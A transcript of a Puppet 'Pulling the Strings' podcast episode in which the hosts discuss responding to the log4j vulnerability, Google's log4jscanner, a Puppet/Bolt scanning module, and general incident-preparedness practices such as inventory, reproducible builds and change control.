Season 4 — Episode 5

The recent log4j fiasco reminded us that not only is it important to stay updated and current with security news, but it's also critical to have safe ways to deploy configuration updates or orchestrate reporting/remediation scripts across your infrastructure as quickly as possible. Jeremy and Nick join us today to share best practices and automation suggestions.

Looking for a better way to say compliant and secure across your hybrid infrastructure with the power of policy as code? That's where Puppet Comply comes in. 


Learn more:

Update: the GI Joe quote our hapless host massacred was  – "Now you know; and knowing is half the battle."


00:00:22 Ben Ford Hello, everybody, and welcome again to today's episode of the Pulling the Strings podcast, as always, powered by Puppet. My name is Ben Ford. I'm a developer advocate here at Puppet. I'm pretty active in the community as @binford2K. So today we're talking with Jeremy Mill and Nick Burgan about something that probably most of us have had to deal with, maybe a more painful way than we really wanted to. I'm talking about the security incident that we had with log4j. I think there were four rapid succession incidents that just kept happening and it was like at the worst possible time, like they always are. So Jeremy is Puppet's sort of resident white hat hacker. He coordinated the response to this log4j vulnerability storm, and he's got lots of things to say about the best ways to respond to these security threats and incidents and, you know, just any other thing that comes up. So, Jeremy, do you have anything that you'd like to say about yourself or the things you're interested in here?

00:01:26 Jeremy Mill Yeah, sure. I've been in security for quite a while now. I sort of stumbled into it. I have a background, originally as a developer and as a systems administrator, and I worked a little bit doing signals intelligence when I was in the military before that. So, you know, one way or another, I've been a bit involved in cybersecurity for years now, and I've been really lucky to kind of end up where I have.

00:01:54 Ben Ford I saw that you had the Marines background listed, and I was really curious to know, like, what does that signal analysis sort of mean?

00:02:01 Jeremy Mill Yeah. So what that was, I was part of what's called a radio battalion. And we were, you know, small signals intelligence teams who would get attached to Marine infantry units or special operations units. And we would provide what's called indications and warnings to those groups that we are attached with, right? So we'd have people, you know, listening to the enemy and, you know, providing things like, Oh, they're over that way or they're watching us as we walk down this road. Maybe this isn't the road that we want to be on right now and things like that.

00:02:38 Ben Ford That's really fascinating. So it's like sort of sifting through all of the noise and picking out the things that are really relevant. It's almost like the the city at home project where we're trying to find the right kind of space objects or something.

00:02:53 Jeremy Mill Yeah, yeah, definitely. I mean, think about all of the different ways that people communicate electronically, you know, and obviously, I can't go into too much detail with any of that, right? But you know, they could be a way that we want to, you know that the enemy is communicating. So being able to, you know, listen to it and respond to it in real time or near real time is a pretty cool, pretty challenging field to be working in.

00:03:22 Ben Ford I bet that's fascinating. I bet it really helps kind of like sift out the signal from the noise when we get security vulnerability reports because like some of them are big deal, some of are not a big deal. It's like, I don't know how to tell the difference, but I know that you do.

00:03:35 Jeremy Mill Yeah, yeah, totally. I think the biggest thing is is that attacker mindset, right? Even when you're working on, you know, the blue team, the defenders side of cybersecurity, knowing how to think like the attacker is, right, because when you're doing signals intelligence, you basically are the attacker, as really valuable.

00:03:54 Ben Ford That's really cool. So moving on to Nick, he's an engineer on our Puppet Enterprise team, and this totally isn't his job at all, but once Google released their log4jscanner tool when he realized that it would fit really well, as like a Bolt task or a fact, or fit into the Puppet infrastructure, and he kind of took it on himself to just build and publish that module. So do you want to tell a little bit about that story?

00:04:21 Nick Burgan Yeah, sure. So this all happens, you know, right at the end of the year, like you're saying, the worst possible time when most people are out on vacation and those of us that were here or just, you know, chatting about it and, you know, working in our security channel on Slack and Google released the scanner and someone, in fact, I think it might have been you, Ben said, Wouldn't it be cool if we put this in a module? And I thought, Yeah, yeah, it would. So I just spent a couple of days and just threw something together and started with a task to run this program that Google made a log4jscanner. And it's a really nice tool. It just, you know, it will scan all the directories that you give it and drill down into JAR files and see if any of them are vulnerable and spit out the ones that are. And so it lends itself really well to, you know, running as a task. You can just run the binary across all your infrastructure and get a nice, centralized list of all the vulnerabilities that you have. So yeah, it was fun little project.

00:05:43 Ben Ford Well, I happened to be lucky enough to live real close to to Nick here. And we're doing a backyard kind of miniature communal beer festival this weekend. So I'm pretty excited to see what Nick brings to share. Do you have like any teasers, any hints it can get by? Give me a little excited there.

00:06:04 Nick Burgan Yeah, I've got one of the standbys here in Portland is to shoot, so I've got an old Abyss that I'm going to bring. And then Southern Oregon Brewing is a company that unfortunately went out of business several years ago, and I still have one of their old porters, so I'm looking forward to cracking that open.

00:06:22 Ben Ford I'm really excited about that. Yeah, the Abyss has never really been one of my all time favorites, but it's crazy watching people line up for it every year when it's released. I swear they have like seven bottles, and everybody in Portland just lines up to be like one of the lucky few who could get one of these bottles.

00:06:41 Nick Burgan Yeah, it's definitely a thing. And a few years ago, I did a 10-year-vertical of Abyss where we had one bottle from the last ten years and they were all very different. It was kind of interesting.

00:06:52 Ben Ford That sounds really fun. Well, how about if we kind of move on? And Jeremy, I think you're probably the one who knows the most about like how this thing played out and like how, what happened, and how it turned into the giant storm that it became. So could you tell us a story about the log4j vulnerability and what our response was to it?

00:07:15 Jeremy Mill Yeah, this was sort of the very classic tale of a disastrous zero day being dropped on Twitter, which is sort of everyone's worst fear, right? Which is why this got the response that it did. I was fortunate to be doomscrolling on Twitter at like 9 p.m. when I actually saw the initial vulnerability report and it came out of Alibaba's research team, which was pretty cool to get, right. It wasn't one of the traditional, you know, names that we hear of releasing research, but also maybe part of the reason why it got dropped in the way that it did before anybody had a chance to patch anything. So I kind of started our response, you know, late that Thursday night, realized that I wasn't going to complete it by any stretch of the imagination. So I figured I'd get some sleep and, you know, start really hitting it the next, the next day. But then after that, I mean, it really just sort of it exploded, right? It became, you know, as everybody started to come online, especially through the U.S., and people started to really realize the width and breadth of how widely deployed this library actually is. It just, you know, it sort of it just it took on a life of its own.

00:08:43 Ben Ford Yeah, I heard that Minecraft was actually one of the first ones hit, one of the first things that hit big.

00:08:50 Jeremy Mill So Minecraft is actually the reason why this functionality got added.

00:08:55 Ben Ford Oh, you're kidding.

00:08:56 Jeremy Mill Yeah. So my understanding is that it was a, you know, a feature request or a pull request from some Minecraft developers because they were basically like, Oh, well, log4j has this ability to do, you know, J and DI lookups and wouldn't it be cool if we could just put some commands in the chat and we could, we could run them, right? But that's also just how remote code execution works. And that's, you know, that's the genesis of how all this went down. And that's the reason why, you know, the continuing conversations around this vulnerability are, how do we manage this open source ecosystem that drives so much of our, you know, critical and enterprise systems?

00:09:42 Ben Ford That's crazy. When did you know that it was such a big deal? Because I remember when I read about it, I was like, Oh, wow, this is going to be big. And like, the next day I looked at it and I was like, Oh, no, it's like, really big. And it was like every single day there was another realization of just how much bigger it with it was than I realized.

00:09:59 Jeremy Mill I think I, I can't remember who it was, but somebody pretty quickly went and said, Oh, I'm just going to scrape MAVEN's package repository, right, and take a look for how many vulnerable versions there are out there. And you know, somebody did that pretty quickly and shared the results of it, and it was just a staggering, staggering number of vulnerable libraries. And it was just clear that like that, plus the ease of exploitation, right? You know, just being able to log this malicious string caused RCE was just out of this world. It's like, Oh, this is not this is not good.

00:10:38 Ben Ford Wow. So how do you like like if you see a vulnerability like that go around, like, how do you know if you're affected? How do you know if that's something that you have to jump on and respond to right away?

00:10:50 Jeremy Mill Yeah, that's a super awesome question, and I think you can look at it from from two perspectives, and I'm lucky enough to, you know, being in product security to wear both of these hats a little bit, you know, from like the AppSec perspective and the, you know, developer of a product perspective. You know, in the ideal situation for absolutely all of your software that you produce, you've got a full bill of materials. And, you know, because you're running a software composition analysis tool, you know, like WhiteSource or Synk or one of those, right? And you could very quickly go, is this a first party dependency that I'm bringing in? Is it a transitive dependency, right? A dependency of something else that I'm bringing in, right? And you should be able to respond to it really quickly. And in the situations where you don't have the ability to very quickly search your code base, right? And also, it's a good way to verify your SCA tool as well, you know, to get a good understanding of what's affected and then what the value of those things are that are affected. Right. So knowing what your crown jewels are, what you're most critical assets are, really helps you do that.

00:12:03 Ben Ford Yeah, that value part, that's huge.

00:12:06 Jeremy Mill Yeah, yeah, exactly. And that's a missing piece from a lot of places, which is unfortunate. And then the other side, right, is the sysadmin piece. And I think that's what like this module that we released really helps with because you might install, you do right, it's guaranteed you install software on your system that you don't fully understand.

00:12:29 Ben Ford Sometimes you don't even know that you install it.

00:12:31 Jeremy Mill Exactly, right. And yeah, it's installed by something else you installed or it came down through an update or, you know, any number of ways. And that's what was a lot harder to answer through this.

00:12:42 Ben Ford That's kind of a fascinating point. You brought up Snyk and like analyzing your dependencies and everything. One of the things that seemed like it made this particular vulnerability really, really hard is just kind of the way that Java dependencies are packed inside the JAR file like the package distribution, but not necessarily like something that you could see externally. Like if it were a like a system library, you just query RPM database of something, but JAR files they could contain anything. And if the thing you're looking at isn't an open source tool that you could just like, crawl back and look at all the repositories everywhere, then you're in to the point of like like, how do you analyze every single thing on your system? And it's something that I always see whenever there is a vulnerability is like there's little snippets of shell code or there's like, here's a little like Perl script that I wrote that's going to tell you if you're vulnerable and everything, how do you know when you can trust those things? And why did we wait until Google releases the scanner instead of using any of the other things to build out our module? I suppose that's for both of you. Input into that.

00:14:02 Jeremy Mill Yeah, I think it's a great question because in one way, right, this is harder to detect because it was, you know, part of a JAR, right, and JARs can be nested in all sorts of things like that. But JAR files or ZIP files and you know, we can, you know, recursively search relatively easily. It's possible to imagine an even worse scenario, which is some very popular but always statically linked library is all of a sudden vulnerable, maybe something built with GO or, you know, built with RUST, right? And with a similar, you know, probably wouldn't be as widely deployed, but could still be bad.

00:14:44 Ben Ford Something that you'd have to decompile?

00:14:46 Jeremy Mill Right, exactly right. Or even worse, the detection rate has a really high false positive rate, which makes it harder to definitively go back to a vendor and say, like, no, you are vulnerable, we need you to patch this.

00:15:01 Ben Ford Some years ago, I remember, what was it, Shell Shock, though that was also really huge. This one might have been bigger, but I did some a module kind of similar using M collective in a fact. And it was literally just a bunch of Shell snippets that I found in different places across the internet that were like, if you run this thing in a segfault, then your version of bashes is vulnerable. And I put it all into a fact. To be honest, I think that was a little bit risky because I didn't completely know what each one of those snippets of Shell code was doing.

00:15:47 Jeremy Mill Yeah, no, that's an awesome point. And I think, you know, one of the reasons that we waited where some of the very first scanners, if we want to call them that, that came out for this were really more of like Red team tools, right? They attempted to just exploit the issue, right? And you know, some of them included, you know, like base64 encoded JNTI payloads, and they were like, trust us, it's fine, right? But you know, they might not have been. I try to stay away, you know, it's like a personal philosophy kind of way, from scanners that boil down to, well, let's try and exploit it. And if we get back a valid result, you know, sometimes that's your only option. But there's lots of undefined behavior as soon as you start getting into the world of launching exploits, whether they're supposed to be benign or not.

00:16:41 Ben Ford Yeah, it kind of sounds like you're saying that it mostly boils down to a matter of trust. You know that it was the fact that we could look at who built this log4jscanner tool, and we had a high level of trust with them.

00:16:56 Jeremy Mill Yes, certainly for me, for sure. You know, also the trust in the stability of the tool, right? I trust that if Google's releasing it and it's something that they're running across their infrastructure, they've done some of their due diligence to at least make sure that they're, you know, doing no harm. You know, if we're going to steal that from doctors in, and that's a huge confidence boost, you know, versus maybe to some random, you know, repository. I might trust that to run locally. You know, in a container or, you know, maybe in my machine if I'm desperate. But as soon as you click that deploy all button and you push it out to everything, that's a different level of trust you have to have.

00:17:38 Nick Burgan It helps that the entire tool is open source that you can go in and see exactly what it's doing. And, you know, with our module, too, you can build the binary yourself if you want to have an extra level of confidence that it's, you know, doing what you think it's doing.

00:17:55 Ben Ford It being written in a way that lets you like, actually read the code and understand what it's doing.

00:18:00 Nick Burgan Yeah, for sure.

00:18:02 Ben Ford That was super useful. So how do people normally manage these scans or updates or whatnot when their infrastructure might be thousands of machines? Like how did they even know where to deploy fixes to? I know that like even this log4jscanner tool that Google released, it was written to work on a local machine like you'd be on the machine that you were testing and it would tell you if it was vulnerable or not. But that doesn't scale out to infrastructures.

00:18:33 Nick Burgan Yeah, that can be a challenging problem, and everyone has many different ways that they put together to accomplish things like that. You know, you could just add a base level, you know, you can SAP the binary to all of your nodes and use a SSH to run it on the nodes and collect all that data and read it all yourself. And that's, you know, that's really cumbersome. Something like Puppet makes it really easy. You know, you have a window into all of your nodes in your infrastructure, and you have this avenue for collecting whatever data you want. So you can write a fact like you were saying to collect that data or in the case of this module, you can really easily, you know, just write this module that contains the binary and some code around it and just go run it on your thousands of nodes and collect all the data in a very centralized place that can really help you to get a good understanding of where your infrastructure is at and what's vulnerable and what isn't.

00:19:31 Jeremy Mill Yeah, I've been, you know, on the writing side of some of those very janky SSH to all of my nodes in an organization type scripts, you know, in situations where I wish I had a tool like Puppet or like this module that would have made that response so much easier. And yeah, it is a nightmare. And you know, sometimes you end up running it nine times because you found edge cases as you were running it. It's a terrible, terrible place to be. Preparation is key.

00:20:00 Ben Ford I have definitely been on that and where I run a job and it's like it's going to take four hours to complete and it's like 87 percent done. And I'm like, Oh crap, OK, well, I guess I got another four hours ahead of me. So if you already are running Puppet, that's really useful. It's easy to just classify your machines and distribute whatever is needed from this module, but what about people who aren't running Puppet yet? Is that something that the Bolt task helps out with?

00:20:31 Nick Burgan Yeah. So Bolt is kind of like, you know, your next step up from, you know, writing a bash script and that necessary chain until your notes, right? So Bolt will make it really easy so you can write a task that does what you want for each of your nodes and then go out and run that at scale and collect all that data back in a centralized way. So in fact, when I was developing this module in the first place, the first thing I started with was just very simple task, right. So all it does is download the binary from the primary server, runs it and spits the results back. And the nice thing about this log4jscanner tool is that it's very simple. It just prints it out on each line, each vulnerable JAR file that it finds, including ones inside other JAR files. So, you know, just as a base level, and probably for most people that works really well, you know, you just want to run this tool and see the results. And you know, if everything's blank, then you're good and then you can take it to the next level if you want, you know, if you want to get fancier with it and you want to actually monitor your infrastructure continuously where you know, maybe someone later on down the line installs a new package that hasn't been updated with the new log4j version and is still vulnerable. You can continuously monitor your infrastructure for introduction of these vulnerabilities. And that's where you can, you know, kind of get more of the Puppet code and the module to actually generate facts for you. And you know, that's kind of another level on top of that.

00:21:59 Ben Ford Yeah, that's pretty cool. And to be clear, it's like Bolt isn't the only thing that can orchestrate running tools like this. There are other products out there that do it. I think it's really important that people know that there are ways that you can, that you don't have to sit down and start by writing a shell script to SSH in a four loop across all of your infrastructures.

00:22:22 Nick Burgan Yeah, absolutely. You got to, you know, pick the tool that you're most comfortable with that you can, you know, rapidly develop these kinds of things, especially when you're in these kind of crunch times where there's a very serious vulnerability that you need to figure out if you're exposed to.

00:22:37 Ben Ford One of the things that I like about Puppet and Bolt module, though, is that it's sitting up there on the Forge and you can just install it and use it. You don't have to build it and develop it for yourself. And because it's built by somebody, that going back to the idea of trust, is built by somebody that we hope you trust, us, and other community members are also running the same thing. You're running something that you have a higher level of confidence in when you have other community members that are also running the same thing. So it's kind of like the distribution of such a tool that I think really adds to the value of it.

00:23:13 Nick Burgan It's kind of crowdsourcing this work, right? There's no need to reinvent the wheel 20 times. You know, if someone creates something that does exactly what you need, great, you know, it reduces your response time. So it's very helpful.

00:23:27 Jeremy Mill One thing I would like to add real quick though, I would advocate for people to try doing something like this before an incident happens, right? The time that you want to figure out the gotchas with any of these tools, right, no matter what tool you're using, is not during an active incident. Right. So be a practice like you play and do that tabletop exercise. Run something, right. Get get who am I back from all your machines? You know what I mean? Something that you can replace later. But try something before an incident.

00:24:06 Ben Ford That's a really good point, actually. And it really kind of supports the idea that we should be using an orchestration tool rather than writing a Shell script that will call the raw tool that Google published because that thing didn't exist four weeks ago, or however long, I guess it's been a couple more weeks than that. So it's brand new. And if you're trying to figure out how to use it and what its limitations are and how to invoke it and what you can trust, etcetera, in that active incident, like you're saying, you're bound to make more mistakes or have a higher stress levels or whatnot. But if you have a tool that you're already used to running and you can just say, Hey, we have a scanner, we trust Google built it and this thing is going to orchestrate it for us and we already know how to do that. Go make it happen. Give me a report back. That's a lot less that you have to, like a lot less cognitive load, you have to take on right away.

00:25:05 Jeremy Mill Yeah. And also, I, you know, thinking about who's running it in that situation, right, to that sort of organizational risk, the person who does it on a regular basis might not be there when the event is happening or, you know, it may be a different team who's taking the lead on it and making sure that that institutional knowledge is shared and supported and, you know, resistant to single points of failure will make a world of difference.

00:25:33 Ben Ford I like that a lot.

00:25:34 Nick Burgan Yeah. And having something like the log4jscanner module, if you look at the code and by the way, it's completely open source, you can go look at it on our GitHub. It's actually a pretty good framework for just running whatever binary you want and collecting the results back in a centralized way. So if you have this framework in place before these things happen, you know you can take the specific tool that is scanning for the specific vulnerability and just, you know, copy this module and add your binary in there and you've already got something ready to go.

00:26:05 Ben Ford That's a really cool idea. Now, you sort of mentioned this the other day, the idea of maybe like making that a little bit more generalizable framework, so it wasn't tied just to log4j, but it could be extended for other scanners to detect other things. Do you have any thoughts or plans on extending that? Or is that just a hey, this is a thing that could happen?

00:26:29 Nick Burgan Yeah, for sure. I think it would be a really useful kind of module to make. So, you know, there are, of course, some log4jscanner specific things in this module, for instance, the flags that you pass, the binary and some of the parameters in the class for setting up the continuous scanning. But by and large, it's pretty generic. So I think it would be great to take this module and, you know, go the next step and make it more generic so that you can run anything and pass whatever flags you need into the binary. Yeah, have it ready to go for the next thing that you need to scan your whole infrastructure for.

00:27:07 Ben Ford Almost sounds like a template for security response.

00:27:10 Nick Burgan Yeah, definitely.

00:27:11 Jeremy Mill This actually just came to my mind, but it would almost be really cool if you know you could use things like, you know, YARA rules or things like that. You know, if you had a specific piece of malware, right? Even if you're maybe searching for things like that, right, it could be really pretty extensible and useful for a wide variety of security incidents.

00:27:32 Nick Burgan Yeah, for sure.

00:27:33 Ben Ford That's a really neat idea. I know that when we did the malware scanning on the Forge, one of the things that we can do with VirusTotal is define our own custom YARA rules to detect things that maybe the big scanners don't. And that that could be really helpful being that Puppet modules aren't necessarily the same kind of things like Windows exe, for example. So that was something that we did consider and we may end up doing sometime in the future. We kind of really covered a lot of this and just kind of organic conversation, but what sort of challenges did you have writing this thing? Were there any things that were particularly difficult that we haven't already talked about?

00:28:19 Nick Burgan Yeah. So when I was writing this module, you know, Google hadn't actually published any compiled binaries yet, so we had to compile it ourselves, which is not hard at all. It's a pretty simple go app, but you know, you also want to make sure that you know, this binary that we are distributing is trusted, right? So there is some checking in the module, some checking just to make sure that, you know, the binary that you're sending out is the one that we packaged with the module. And also in the read me, there are instructions on exactly how we built it from what commit we built it from and Google's log4jscanner repo so that there's traceability. So I suppose that's one challenge. Another is just that kind of creating the framework for that kind of next layer where you have the continuous monitoring for your infrastructure, not just running the task, but actually, you know, kind of running this app on a regular basis and collecting that data in a fact. In this case, it actually was not too hard because we have another module that does something similar called The Patch, which is based off the OS patching module by Tony Greene. So we're able to, you know, kind of take a lot of that code and pare it down and apply it here. But, you know, if we hadn't had that, it would be a bit more work to kind of put all that machinery in place.

00:29:49 Jeremy Mill I was going to say I'm really glad that you brought up, you know, the importance of reproducible builds. Security people love reproducible builds and I think everybody should, you know, so regardless of whatever software that you might be writing, right? That's it. It's really nice to be able to provide that as a feature to your users.

00:30:10 Ben Ford That's exactly the same thing I was going to ask about, is just to clarify that we were talking about like how you trust, not only do you trust the thing from Google, but you trust it. We are not sneaking something in nefariously in between and being able to go back and validate this matches that build that I pulled from that repo. This maybe this is a question for Jeremy, I think, as the security expert here, in the having the experience in responding to these things long term. One of the things that this module does is it monitors, like periodically runs the scan like, like Nick was saying and reports back. But that scan itself, it's not a lightweight thing. So I assume that at some point we can say, Hey, we're done with this incident. We no longer need to run this scan and check this thing. How do you make that determination? How do you decide when to pull this back?

00:31:08 Jeremy Mill That's a really good question, and I don't know that there is an easy answer. You know, at the last check, Google actually ran numbers again against Maven. And, you know, fairly a non-trivial percentage of, you know, packages that had log4j in them still have the vulnerable version. So I guess a lot of that would depend on what your change control processes are, right? If you're not confident that somebody in your organization isn't going to pull in untrusted packages or install untrusted software or software that hasn't been checked, you know, as part of some other continuous process, right, then, you know, then it's going to have a lot longer of a tail for you to run this. But if you do have good change control procedures and you do have a high degree of confidence in, you know, who is installing things on your systems and in the processes that check those things that they're installing. You know, it could be a much shorter window right there, orgs out there probably have stopped running this already. And others who are, you know, might be looking at doing this for, you know, a full calendar year or longer.

00:32:30 Ben Ford How annoying must it be to do like a complete audit and like clean all of your infrastructure of this thing. And then for it to just kind of sneak back in at a like a transitive dependency three months later?

00:32:41 Jeremy Mill Regressions happen all the time, and certainly, no one here is is amazed by that. But that's, you know, that's just a fact of life. And I don't have the answer. I've been responsible for regressions by accident before, you know, so it's a hard problem. And it's about building resilient processes, because that's really your best defense.

00:33:07 Nick Burgan And I think that's why you need to have some sort of continuous monitoring of your infrastructure to make sure that these things aren't slipping back in, that you have some way to detect when they slip back in, and you have something in place to make sure that doesn't happen.

00:33:22 Ben Ford It's something that you said, Jeremy, kind of like sparked a thought, and this is sort of like half formed. I don't really have a complete question, but I think you'll probably get the gist of what I'm saying here is, like the idea of taking this scanner and then pulling it back because you have some kind of validation built into your change control. So you know what software is being deployed and where, etcetera, when you have something like Puppet or Ansible, you know, things that deploy software into to your infrastructure, that configuration, it always goes through your CI pipeline. But the software that it actually pulls down and installs doesn't necessarily, like depending on how you have your own policy set up, you might be pulling directly from an install source or a repository on the internet rather than through your own pipelines. So do you have suggestions, maybe on processes or tools or like maybe this is something that can help with and tracking down those transitive dependencies?

00:34:31 Jeremy Mill Yeah. So you know, there's there's a decent number of ways to control for things like that, you know, but this is at the heart of the supply chain attack scenario, which is even if there's something that was previously trusted, right? It can become malicious. Whether that's, you know, we have lots of examples of npm packages recently becoming malicious or being typos squatted, right? So when it got retyped by someone, you know, they accidentally pull in the malicious one. You know, one solution might be that, you know, before we actually deploy this change to prod, you know, we deploy to a staging environment, and that's where we can run our log4jscanner, right? Make sure that this image, this set of what we're pulling in right now is clean from what our rules are, right? And we take that performance hit there because it's not carrying a production workload. And then we can promote it to being our production system, things like that.

00:35:36 Ben Ford Yeah, those are great suggestions. And honestly, that's not limited to just security issues, either. It's like, this is how you validate that you get good changes, that you get trusted changes go out into your infrastructure. That was something that I had intended to ask, and I think I kind of skipped over it and zoomed on to get to some of the more juicy tech details here. But one thing that I remember you saying and I don't remember the exact words, but one thing that I remember having a conversation about early in this vulnerability response is to like, slow down and look at it more methodically and not rush something out before we were certain what the impacts were going to be. Oh, what's the narrative around that? Do you have suggestions about how people can do that at the appropriate speed, like respond as quickly as possible, but also without breaking things in the meantime.

00:36:34 Jeremy Mill Yeah, I think one of the things that's, you know, I think a lot, if not most orgs, probably do this right. But you know, we said before, like first do no harm, right? And I think that's important right, to get it right. But, you know, stop and actually, to the extent that you can figure out what is vulnerable, in what ways you can accurately assess the risk that you're facing, because that's going to drive a lot of your decisions and also being prepared to put mitigations in place, right? So these are things that aren't fixes, they're WAF rules, you know, nobody can block, you know, log4j exploitation with a WAF, right? There's six million bypasses. But you know, in that first day, two days where almost all of the exploits that people were seeing all looked the exact same, you could have a pretty high degree of confidence that you weren't going to get exploited by this so that you could, you know, buy yourself that window to make sure the fix that you're putting out is the right one and that you're actually fixing the issue to the greatest extent possible.

00:37:57 Ben Ford All right. So we're kind of getting closer to the end here. So do either of you have advice for people mitigating things like this in the future? I know this is not going to be the last one that we see. We've already seen another several in the meantime. So how do people respond effectively? Are there suggestions that we haven't already talked about?

00:38:20 Nick Burgan I think just, you know, having something in place to be able to monitor your infrastructure that you know, a framework where you can actually have observability into what's on all of your nodes and be able to run a scanner or whatever to be able to detect issues, new issues that come up. So, you know, having your infrastructure in place to be able to do that.

00:38:46 Jeremy Mill Yeah, I agree. I think step zero for all of these things is inventory, right? Inventory your assets, inventory your software, inventory the bill of materials that makes up, you know, if you're if you're writing software that you can use that, you know. Right. Knowing that is critical and then knowing which ones of those assets are the most critical, right, doing that crown jewels analysis so that you know what's the most important thing to secure first, because not everything can be a critical asset. And then, exactly like what Nick said, practicing and being prepared to respond. You know, you don't want to create an incident response checklist while you're responding to an incident. Right, that's the wrong time. So having that ready ahead of time and having practiced and having playbooks made, combined with that crown jewels and that inventory is going to set you up for success.

00:39:51 Ben Ford Absolutely. One thing that we briefly touched on, and I think we could probably close here is the fact that this was an open source project that made a lot of it easier because we were able to look at the code and we're able to sort of like, see what the problems were and figure out if we were vulnerable. But often we don't have that luxury. And the vulnerability is very deep in some proprietary closed source product. And there's pros and cons to both of those. I mean, like if we look at open source projects, we have that transparency, but we also don't have accountability. We don't have somebody with a support agreement that we can file a ticket with. Whereas with commercial vendors, we usually do. Do you have any suggestions for companies for like navigating either of those?

00:40:52 Nick Burgan From my point of view, community is extremely important. You need to be a member of a community, and maybe that is, you know, a community. No one can detect and mitigate these vulnerabilities on their own in an effective way, right? We all need to work together to develop solutions to help us all out, to see these problems coming and to mitigate them when they arrive. So I think it's very important for us to share tools like the Googles' log4jscanner, like our module, any other tools that are out there so that we can all respond to these as quickly as possible, as effectively as possible.

00:41:35 Jeremy Mill Yeah. I want to second that, for sure. Describing this community, I think, is awesome. And then I also think it's important for organizations to try and donate back, right? You know, like our team, something I've done at other orgs and I'm trying to increase us doing here at Puppet, is we do, you know, hack yourself first Fridays where you know, we try to do security testing against your features of our product, but also right, that also includes like, hey, here's an open source library that we use quite a bit, right? Donating some of our time and expertize to doing some testing on that right, doing some fuzzing and, you know, submitting patches or even just raising issues, right? And if you can't do that, right, if that's not what your org does, donating money can be really useful as well, right? But doing something to give back is really important.

00:42:36 Ben Ford And I absolutely agree with that. I think that we should all be contributing back a lot more than we are. And I don't mean us as Puppet the company, I mean, like the entire industry. I think that we could all do a better job at contributing back and participating in this open source community. So I think as we close up here, I think the lesson I'm hearing is that the real critical parts about any of these sort of security responses is preparation. And that's like having good inventory, knowing what you have in your infrastructure and like practice, expertize, using your tools, the things that deploy, the things that orchestrate, the things that report, etcetera. And then during the response itself, having that ability to move quickly to mitigate issues, but in a safe and intentional controlled manner so that you know exactly what you're deploying and you know where and you have a really good idea of what effects it's going to have and going back to the preparation a bit, having systems that already do this, the inventory and the orchestration and monitoring and observability systems, I think those are, like, absolutely essential. And whether that's Puppet or Bolt or something else, I think that's the thing that we really want to kind of drive home. It's like, have these systems in place already and know how to use them so that you're ready to use them as quickly as you can when when the time comes to that. Do either of you want to extend on that at all?

00:44:18 Jeremy Mill I think you largely nailed it. We try to describe it on our team as time of detection, to time of mitigation, to time of response, right? Or time of fix. Right. And that, you know, that can take a lot of different forms. But like your time of detection, if you have a good bill of materials is really low, your time of mitigation, if you can have a good idea of what the exploit looks like can be really low in the time of response. If you're prepared with something like the log4j, to run something like the log4j module to discover all of your vulnerable assets and fix them can be really low as well. So, you know, preparing to make sure that all of those, you know, time deltas are as small as possible.

00:45:06 Nick Burgan Yeah. And adding on to that is, you know, making sure that the tools work for you, right? If you have a set of tools that are cumbersome within your environment or you have people who don't have the expertize in those tools, are not comfortable with those tools, they're not going to do much good. So make sure that you have the right tools in place. You have the right content in place so that you can very rapidly respond.

00:45:32 Ben Ford So if people have any questions or they want to follow up in conversation with either of you, are you available, maybe in the community Slack or on social media or anything?

00:45:46 Jeremy Mill Yeah, I'm available in the community Slack, especially in the security channel. You know, if you want to talk to me, you can always send me a message and then I'm also on Twitter at @living_syn. Which is a super nerdy and terrible joke.

00:46:03 Ben Ford How many people like, like, reach out to you and make a joke?

00:46:07 Jeremy Mill Not enough. I feel like we need more of that. More nerdy jokes everywhere, please.

00:46:13 Nick Burgan Completely agree. I am also in the community Slack I'm NickB the our Puppet community Slack. I'm kind of a social media Luddite, so it's about all I have. But you can definitely reach me there

00:46:24 Ben Ford Right on, and because this module is open source, so we are accepting contributions to it. So if you look at this module and you have ways to improve it, we would love for you to submit a PR or an issue or even just talk about it like ways that we could use that in other ways, like Nick was saying earlier, making it generic so that we can drop other kind of scanning tools in it. And you don't have to, like, scramble to run, write all these things down because we will attach links to the end of the show notes here. So if you just check it out on the Puppet website, just look for the podcast. You'll see this one listed down at the bottom. There will be a list of all of the links and the things that we talk about. And that's a wrap today. And once again, thanks for being here, thanks for listening, joining us in this conversation. I had a really good time. And even though I thought that I had a pretty decent idea of what the conversation was going to be and what this landscape looks like, I feel like every time I talk to you, it's like my understanding grows just a little bit more. And I love that experience. So thanks for being on here. Thanks for chatting, and thanks for giving me all these wonderful ideas.

00:47:41 Jeremy Mill Thank you so much for having me. Thank you.

00:47:43 Ben Ford Thanks for being here on Pulling the Strings, as always, powered by Puppet.